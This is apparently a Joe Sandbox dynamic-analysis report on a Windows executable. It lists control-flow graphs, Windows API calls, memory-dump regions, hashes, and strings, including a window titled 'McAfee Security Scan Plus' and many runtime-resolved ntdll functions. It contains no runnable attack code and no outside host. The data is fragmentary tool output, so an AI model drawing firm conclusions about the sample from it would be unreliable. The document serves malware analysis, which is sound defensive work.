62240 3f04d7 62232->62240 62241 3f0562 62232->62241 62242 3f0422 62232->62242 62327 3f01ea __Mtx_unlock _Ref_count_obj 62232->62327 62233->62327 62328 4247d2 13 API calls 62234->62328 62243 3f027d 62235->62243 62244 3f01a5 62235->62244 62329 4247d2 13 API calls 62236->62329 62335 4247d2 13 API calls 62237->62335 62336 4247d2 13 API calls 62238->62336 62330 4247d2 13 API calls 62239->62330 62333 4247d2 13 API calls 62240->62333 62334 4247d2 13 API calls 62241->62334 62331 4247d2 13 API calls 62242->62331 62251 3f02bb GetClientRect 62243->62251 62252 3f0286 62243->62252 62253 3f01ab 62244->62253 62254 3f0235 NtdllDefWindowProc_W 62244->62254 62247 3f02d4 62260 3f02df IsWindow 62247->62260 62261 3f070b 62247->62261 62251->62327 62252->62233 62252->62327 62264 3f01b2 62253->62264 62265 3f01f1 62253->62265 62267 3f024d GetClientRect 62254->62267 62254->62327 62256 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 62269 3f02b2 62256->62269 62259 3f04e1 62274 3f04ec 62259->62274 62275 3f0728 62259->62275 62276 3f02f3 BringWindowToTop 62260->62276 62260->62327 62337 424c11 188 API calls IsInExceptionSpec 62261->62337 62262 3f0430 62277 3f071d 62262->62277 62278 3f043b 62262->62278 62263 3f0337 62279 3f0342 SetWindowTextW 62263->62279 62280 3f0711 62263->62280 62264->62233 62281 3f01bb 62264->62281 62285 3f01fa IsWindow 62265->62285 62286 3f0229 PostQuitMessage 62265->62286 62266 3f056c 62283 3f072e 62266->62283 62284 3f0577 62266->62284 62267->62327 62268 3f05f7 62287 3f0734 62268->62287 62288 3f0602 62268->62288 62270 3f0674 62289 3f067f 62270->62289 62290 3f073a 62270->62290 62271 3f03e3 62272 3f03ee IsWindow 62271->62272 62273 3f0717 62271->62273 62293 3f0402 SetForegroundWindow 62272->62293 62272->62327 62339 424c11 188 API calls IsInExceptionSpec 62273->62339 62294 3f04f9 IsWindow 62274->62294 62274->62327 62341 424c11 188 API calls IsInExceptionSpec 62275->62341 62276->62327 62340 424c11 188 API calls 
IsInExceptionSpec 62277->62340 62295 3f5630 185 API calls 62278->62295 62311 3f035d 62279->62311 62326 3f0372 62279->62326 62338 424c11 188 API calls IsInExceptionSpec 62280->62338 62297 3f01c7 GetClientRect 62281->62297 62281->62327 62342 424c11 188 API calls IsInExceptionSpec 62283->62342 62298 3f0584 IsWindow 62284->62298 62284->62327 62285->62286 62301 3f0205 ShowWindow DestroyWindow 62285->62301 62286->62327 62343 424c11 188 API calls IsInExceptionSpec 62287->62343 62305 3f060f GetWindowRect 62288->62305 62288->62327 62291 3f06df 62289->62291 62292 3f0688 GetWindowRect 62289->62292 62344 424c11 188 API calls IsInExceptionSpec 62290->62344 62321 3ee7b0 239 API calls 62291->62321 62291->62327 62308 3f06ad MoveWindow Sleep 62292->62308 62293->62327 62309 3f0508 ShowWindow 62294->62309 62294->62327 62310 3f0449 62295->62310 62297->62327 62312 3f0593 ShowWindow 62298->62312 62298->62327 62301->62286 62314 3f0634 MoveWindow Sleep 62305->62314 62315 3f06d7 62308->62315 62308->62327 62316 3f051b UpdateWindow 62309->62316 62324 3f0530 62309->62324 62332 3fa970 240 API calls 3 library calls 62310->62332 62323 3ee7b0 239 API calls 62311->62323 62311->62326 62318 3f05a6 UpdateWindow 62312->62318 62312->62324 62313 3f0723 62319 4291af 183 API calls 62313->62319 62320 3f0662 62314->62320 62314->62327 62315->62308 62316->62324 62316->62327 62318->62324 62318->62327 62319->62275 62320->62314 62321->62327 62322 3f044e 62325 3ee7b0 239 API calls 62322->62325 62322->62326 62323->62326 62324->62291 62324->62327 62325->62326 62326->62313 62326->62327 62327->62256 62328->62247 62329->62263 62330->62271 62331->62262 62332->62322 62333->62259 62334->62266 62335->62268 62336->62270

                                Control-flow Graph

[Control-flow graph of the function at 0x3F0140: basic-block listing (block ranges, edges and executed/not-executed colouring) rendered from the interactive graph widget, not reproduced here. The function dispatches on a message value and falls through to NtdllDefWindowProc_W, i.e. it is a window procedure; API calls on its blocks: NtdllDefWindowProc_W, GetClientRect, IsWindow, ShowWindow, DestroyWindow, PostQuitMessage, BringWindowToTop, SetWindowTextW, SetForegroundWindow, GetWindowRect, MoveWindow, Sleep, UpdateWindow.]
                                APIs
                                • GetClientRect.USER32(?,?), ref: 003F01CC
                                • IsWindow.USER32(000701F0), ref: 003F01FB
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,0043B4CD,000000FF), ref: 003F020D
                                • DestroyWindow.USER32(000701F0,?,?,?,?,?,?,?,?,?,?,?,0043B4CD,000000FF), ref: 003F0223
                                • PostQuitMessage.USER32(00000000), ref: 003F022B
                                • NtdllDefWindowProc_W.NTDLL(?,00000084,?,000000FF,A05DD77D), ref: 003F023F
                                • GetClientRect.USER32(?,?), ref: 003F0252
                                • NtdllDefWindowProc_W.NTDLL(?,?,?,000000FF,A05DD77D), ref: 003F0295
                                • GetClientRect.USER32(?,?), ref: 003F02C0
                                • IsWindow.USER32 ref: 003F02E5
                                • BringWindowToTop.USER32 ref: 003F02F9
                                • __Mtx_unlock.LIBCPMT ref: 003F0304
                                • SetWindowTextW.USER32(000000FF), ref: 003F0353
                                • __Mtx_unlock.LIBCPMT ref: 003F03CA
                                • IsWindow.USER32 ref: 003F03F4
                                • SetForegroundWindow.USER32 ref: 003F0408
                                • __Mtx_unlock.LIBCPMT ref: 003F0413
                                • __Mtx_unlock.LIBCPMT ref: 003F04C8
                                • IsWindow.USER32(000701F0), ref: 003F04FA
                                • ShowWindow.USER32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,0043B4CD), ref: 003F0510
                                • UpdateWindow.USER32 ref: 003F0521
                                • IsWindow.USER32(000701F0), ref: 003F0585
                                • ShowWindow.USER32(00000009,?,?,?,?,?,?,?,?,?,?,?,?,?,0043B4CD), ref: 003F059B
                                • UpdateWindow.USER32 ref: 003F05AC
                                • __Mtx_unlock.LIBCPMT ref: 003F06FC
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$Mtx_unlock$ClientRectShow$NtdllProc_Update$BringDestroyForegroundMessagePostQuitText
                                • String ID:
                                • API String ID: 4037737374-0
                                • Opcode ID: b45d2054eea2168f667cd67b0ed08ba4388e1e1dea0faddbc84568d19ec4e164
                                • Instruction ID: e99d5c86284d2033ef05c40c9caacdca6893b5f0676ebbcac790da8b543b561a
                                • Opcode Fuzzy Hash: b45d2054eea2168f667cd67b0ed08ba4388e1e1dea0faddbc84568d19ec4e164
                                • Instruction Fuzzy Hash: 9AE12775A00208EBDB1AAF68ED4DB7E3768FB45304F114535F601E6192EBB59C20CB7A

                                Control-flow Graph

                                control_flow_graph 931 3ff4f0-3ff54d GetCurrentProcess 932 3ff54f-3ff557 GetModuleHandleW 931->932 933 3ff55a-3ff5a3 call 3ff3f0 931->933 932->933 938 3ff619-3ff626 933->938 939 3ff5a5-3ff5aa 933->939 940 3ff629-3ff62c 938->940 941 3ff5ac-3ff5b1 939->941 942 3ff5b7-3ff5cd call 3ffcb0 939->942 944 3ff62f-3ff639 940->944 941->942 945 3ff781-3ff79b 941->945 949 3ff5cf-3ff617 call 3ff3f0 942->949 950 3ff641-3ff65d 942->950 947 3ff63f-3ff6e0 NtCreateFile 944->947 948 3ff75e-3ff77f call 3fa3b0 944->948 945->940 958 3ff6e6-3ff705 call 405de0 947->958 959 3ff7a0-3ff7de call 3fa3b0 947->959 956 3ff736-3ff75d call 3f4420 call 425711 948->956 949->938 949->939 950->944 965 3ff70a-3ff711 958->965 970 3ff72e-3ff731 call 3fb060 959->970 968 3ff717-3ff723 965->968 969 3ff7e3-3ff804 call 3fa3b0 965->969 973 3ff726-3ff729 call 3f4420 968->973 969->973 970->956 973->970
                                APIs
                                • GetCurrentProcess.KERNEL32(A05DD77D,00000000,?), ref: 003FF540
                                • GetModuleHandleW.KERNEL32(00000000), ref: 003FF551
                                • NtCreateFile.NTDLL ref: 003FF6CE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateCurrentFileHandleModuleProcess
                                • String ID: `F$`F
                                • API String ID: 1303309024-2864732840
                                • Opcode ID: 256282baa7a855bbe776f1ec4a39bb9562cf49c93427d49c17792caf6df1670b
                                • Instruction ID: f32b3d68b50dc6f3dd28dcb64ef6c9c98290b2723bf1be2deb32fdd557530ef3
                                • Opcode Fuzzy Hash: 256282baa7a855bbe776f1ec4a39bb9562cf49c93427d49c17792caf6df1670b
                                • Instruction Fuzzy Hash: 82A147B5D0020C9FDB11CFA4C985BEEBBF5AF09314F24812AE915AB390DB746948CF95
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4
                                • API String ID: 0-4088798008
                                • Opcode ID: 153efcc03a3b06e051accb17469f40628ed248748e647a8de94472a7a7f2d82e
                                • Instruction ID: 20df94e2eb4b55bc73b13d045ee95b5d3ae378f5f4db850c95ec14aac4bd6036
                                • Opcode Fuzzy Hash: 153efcc03a3b06e051accb17469f40628ed248748e647a8de94472a7a7f2d82e
                                • Instruction Fuzzy Hash: B5A2EA34A00219DFDB54CF98D994BADB7B6FB88700F158099E909AB355CB31EE46CF90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DispatchMessage
                                • String ID:
                                • API String ID: 2061451462-0
                                • Opcode ID: 73f7d3991be512e6bbf92eca55bb1b35af76935ed473597548bbfae615f22e9d
                                • Instruction ID: d35470a5d547eb0e4bf89ff1d425e66fe1a77119b5b1cbc6cf40cef9b7a99ccf
                                • Opcode Fuzzy Hash: 73f7d3991be512e6bbf92eca55bb1b35af76935ed473597548bbfae615f22e9d
                                • Instruction Fuzzy Hash: 7BF17B30E00609CFEF54DFA9C858BADBBF5BF88314F158558E405AB2A5DB74E949CB80
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06303042
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f173772fa5465cfd57e506742a1a2a019452b6a48d01cc2e5594fa7e4c3229d4
                                • Instruction ID: 3fbf761878604a27aed786f223ce4894bf1f5c7f74d4699280c84dde7afcf076
                                • Opcode Fuzzy Hash: f173772fa5465cfd57e506742a1a2a019452b6a48d01cc2e5594fa7e4c3229d4
                                • Instruction Fuzzy Hash: 0A6113B1C04249AFEF11CF99C884ACEBFB5FF48300F15816AE918AB261D771A955CF90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63b713b608cbc176d227dff2a3974ec02e87b6857e871a9e667890b10a75b210
                                • Instruction ID: 93722a656ec2c2ee27564a9d9675c15c321be6e7ffd15986660f3e3f935899f8
                                • Opcode Fuzzy Hash: 63b713b608cbc176d227dff2a3974ec02e87b6857e871a9e667890b10a75b210
                                • Instruction Fuzzy Hash: F9B1FE70A007058FDB88EF79C894A6EBBF5FF88310B008529C45ADB380DB74E949CB94
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d995c196f4d72e77b0d6e36b5ab74a63a88288fe928809e63e08b65475246c5
                                • Instruction ID: c18b9b7f2e093878b5d88b9971e09ba63126bb5b344567e82983da20bdd92077
                                • Opcode Fuzzy Hash: 5d995c196f4d72e77b0d6e36b5ab74a63a88288fe928809e63e08b65475246c5
                                • Instruction Fuzzy Hash: D9A18235E1031A9FEB04DFA4D8949DDFBBAFF89310F158615E415AB2A0DB30E949CB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bbbf604a8101d54d731daab6285ece24edff54044f7e286842c4f2c6e70478ab
                                • Instruction ID: 3bc47398cdd7423b976ec552e60a3bfdaef23b532844659af6d29ffa4ca4e27c
                                • Opcode Fuzzy Hash: bbbf604a8101d54d731daab6285ece24edff54044f7e286842c4f2c6e70478ab
                                • Instruction Fuzzy Hash: C691C435E1031A9FDB05DFA4D8549DDFBBBFF8A310F158215E415AB2A0DB30A949CBA0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d94f838d753422481ae37bd4871bbe53b820d5ff3e1dec86ebaa305a3bfebe8
                                • Instruction ID: 7d7433680ecfda654dc653ec0f20b8780a38598607d5d6d81108f2dd96eaff31
                                • Opcode Fuzzy Hash: 6d94f838d753422481ae37bd4871bbe53b820d5ff3e1dec86ebaa305a3bfebe8
                                • Instruction Fuzzy Hash: B061BE74B01246CBE745CF3DF848706BBA2F7C4314F449AA5D4045B316EBB85C2ADB9A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3846304760.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_25b0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e02574e695b54a7aa9428223a2dbbdf1ffa5eb1b16dad72044cd20ca5977a2ad
                                • Instruction ID: 21f3890b2d81e78ef4191407153f012ed2b9ead09f57ad0ea8719f2f16ed9a69
                                • Opcode Fuzzy Hash: e02574e695b54a7aa9428223a2dbbdf1ffa5eb1b16dad72044cd20ca5977a2ad
                                • Instruction Fuzzy Hash: 11616C74B01246CBE745CF3EF848706BBA2F7C4314F4495A5D4045B316EBB85C29DB9A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentHandleModuleProcess
                                • String ID:
                                • API String ID: 65871501-0
                                • Opcode ID: 990a8e48d40559c324804b157da6bd32262217e06847ffbfe270420d5c7e5150
                                • Instruction ID: 6f2c2909d9a92e6a0b86cf1c6a1141e1223fd5e31827d999f8df5af589125d74
                                • Opcode Fuzzy Hash: 990a8e48d40559c324804b157da6bd32262217e06847ffbfe270420d5c7e5150
                                • Instruction Fuzzy Hash: 4B418DB5D043489FDB11CFA9C8447AEBBF4FB09304F10426EE955A7381EB756A48CB91

                                Control-flow Graph

                                APIs
                                • GetNativeSystemInfo.KERNEL32(?), ref: 00402A7A
                                • GetLargePageMinimum.KERNEL32 ref: 00402AA2
                                • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402AB3
                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00402BA9
                                • GetModuleHandleW.KERNEL32(KernelBase.dll), ref: 00402BF3
                                • GetLastError.KERNEL32 ref: 00402C2F
                                  • Part of subcall function 00402C60: GetProcAddress.KERNEL32(00000000,?), ref: 00402D83
                                • GetLastError.KERNEL32 ref: 00402C3A
                                • GetLastError.KERNEL32 ref: 00402C42
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorHandleLastModule$AddressInfoLargeMinimumNativePageProcSystem
                                • String ID: DeleteProcThreadAttributeList$InitializeProcThreadAttributeList$KernelBase.dll$LdrFindEntryForAddress$LdrRegisterDllNotification$LdrUnregisterDllNotification$NtClose$NtCompareTokens$NtCreateDirectoryObjectEx$NtCreateFile$NtCreateSymbolicLinkObject$NtFsControlFile$NtOpenFile$NtPowerInformation$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQueryEaFile$NtQueryFullAttributesFile$NtQueryInformationByName$NtQueryInformationFile$NtQueryInformationProcess$NtQueryInformationThread$NtQueryLicenseValue$NtQueryObject$NtQuerySection$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtQueryVolumeInformationFile$NtResumeProcess$NtSetEaFile$NtSetInformationFile$NtSetInformationProcess$NtSuspendProcess$NtWow64ReadVirtualMemory64$ProcessIdToSessionId$QueryInterruptTime$QueryInterruptTimePrecise$QueryUnbiasedInterruptTimePrecise$RtlGetNtVersionNumbers$RtlGetOwnerSecurityDescriptor$RtlUnicodeToUTF8N$SetProcessDEPPolicy$SetProcessMitigationPolicy$SetSearchPathMode$SetThreadDescription$UpdateProcThreadAttribute$VirtualProtect$kernel32.dll$ntdll.dll
                                • API String ID: 871164704-2839307195
                                • Opcode ID: 5576ba9b86849a80563f6e86774a2ccf2593322dcac9ae1b0b56b3b023698333
                                • Instruction ID: b7522c3fc8fc10e5ec40f3b4bf9c1064ceb748ebb8959aca406198028d11ff47
                                • Opcode Fuzzy Hash: 5576ba9b86849a80563f6e86774a2ccf2593322dcac9ae1b0b56b3b023698333
                                • Instruction Fuzzy Hash: 7CE1E7B1405B448BE361CF61C498BD7BBF8BF44308F048A1EE5AB96650DBB9B14CCB95

                                Control-flow Graph

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,0000006B,A05DD77D,?), ref: 003EFA02
                                • LoadIconW.USER32(00000000), ref: 003EFA0F
                                • LoadCursorW.USER32(00000000,00007F00), ref: 003EFA1E
                                • LoadIconW.USER32(?,0000006B), ref: 003EFA50
                                • RegisterClassExW.USER32(00000030), ref: 003EFA5F
                                • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Windows Desktop Guided Tour,00000000), ref: 003EFA78
                                • CreateWindowExW.USER32(00000000,MSSP,McAfee Security Scan Plus,00CF0000,00000000,00000000,?,00000000), ref: 003EFAB7
                                • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Windows Desktop Guided Tour,00000000), ref: 003EFAD6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Load$IconMessage$ClassCreateCursorHandleModuleRegisterWindow
                                • String ID: 0$Call to CreateWindow failed!$Call to RegisterClassEx failed!$MSSP$MSSPWebEB$McAfee Security Scan Plus$McAfee Security Scan Plus$Windows Desktop Guided Tour
                                • API String ID: 3932116867-1317735066
                                • Opcode ID: 5975adcc274b7b1cf33e115d8f6f710ff3a01e5ec319f37b37053a5ba15d8e79
                                • Instruction ID: eea96783a16ce7c56c800205ab3915e196e871bec9d5450592bee46c0e7abd31
                                • Opcode Fuzzy Hash: 5975adcc274b7b1cf33e115d8f6f710ff3a01e5ec319f37b37053a5ba15d8e79
                                • Instruction Fuzzy Hash: 10A10875A40319AFEB209F60DC4DF9A7B74BB04704F2042A5FA08A72D0EBF55A54CF59

                                Control-flow Graph

                                control_flow_graph 224 4070b0-4070ee GetCurrentProcess IsWow64Process 225 4070f4-40710c 224->225 226 40721a-407235 GetLastError 224->226 227 40711a-40713b GetCurrentProcess IsWow64Process2 225->227 228 40710e-407110 225->228 229 40723d-407260 GetLastError 226->229 227->229 231 407141-40715f 227->231 228->227 230 407112-407116 228->230 232 407162-407168 229->232 230->227 231->232 233 407176-407184 232->233 234 40716a-40716c 232->234 236 407265-407268 233->236 237 40718a 233->237 234->233 235 40716e-407172 234->235 235->233 238 40718f-4071ad CreateFileW 236->238 237->238 239 4071d1-4071e4 call 425711 238->239 240 4071af-4071c4 GetFinalPathNameByHandleW 238->240 241 4071e5-4071ea 240->241 242 4071c6-4071c8 240->242 241->242 246 4071ec-4071fd 241->246 242->239 244 4071ca-4071cb CloseHandle 242->244 244->239 247 407206-407219 call 425711 246->247 248 4071ff-407200 CloseHandle 246->248 248->247
                                APIs
                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 004070DF
                                • IsWow64Process.KERNEL32(00000000), ref: 004070E6
                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 0040712C
                                • IsWow64Process2.KERNELBASE(00000000), ref: 00407133
                                • CreateFileW.KERNEL32(?,00100080,00000007,00000000,00000003,02000000,00000000), ref: 004071A2
                                • GetFinalPathNameByHandleW.KERNEL32(00000000,\\?\C:\Windows,00000100,00000000), ref: 004071BC
                                • CloseHandle.KERNEL32(00000000), ref: 004071CB
                                • CloseHandle.KERNEL32(00000000), ref: 00407200
                                • GetLastError.KERNEL32 ref: 0040721A
                                • GetLastError.KERNEL32 ref: 0040723D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleProcess$CloseCurrentErrorLastWow64$CreateFileFinalNamePathProcess2
                                • String ID: \\?\C:\Windows
                                • API String ID: 2836744321-641808500
                                • Opcode ID: 3bae3f3843dc899a0f64d81daf9a8d42028df3d59ca79975358020a9ca6086d2
                                • Instruction ID: e30ee83700e47513f3ebd4f1eda3b31654a2f2d1c890ed119358a9931c281381
                                • Opcode Fuzzy Hash: 3bae3f3843dc899a0f64d81daf9a8d42028df3d59ca79975358020a9ca6086d2
                                • Instruction Fuzzy Hash: 6D51B674E052059FDB10DFA5DC457AE7BB4AF09700F10417AE811FB3D1EB79AA048B9A

                                Control-flow Graph

                                • Executed
                                • Not Executed
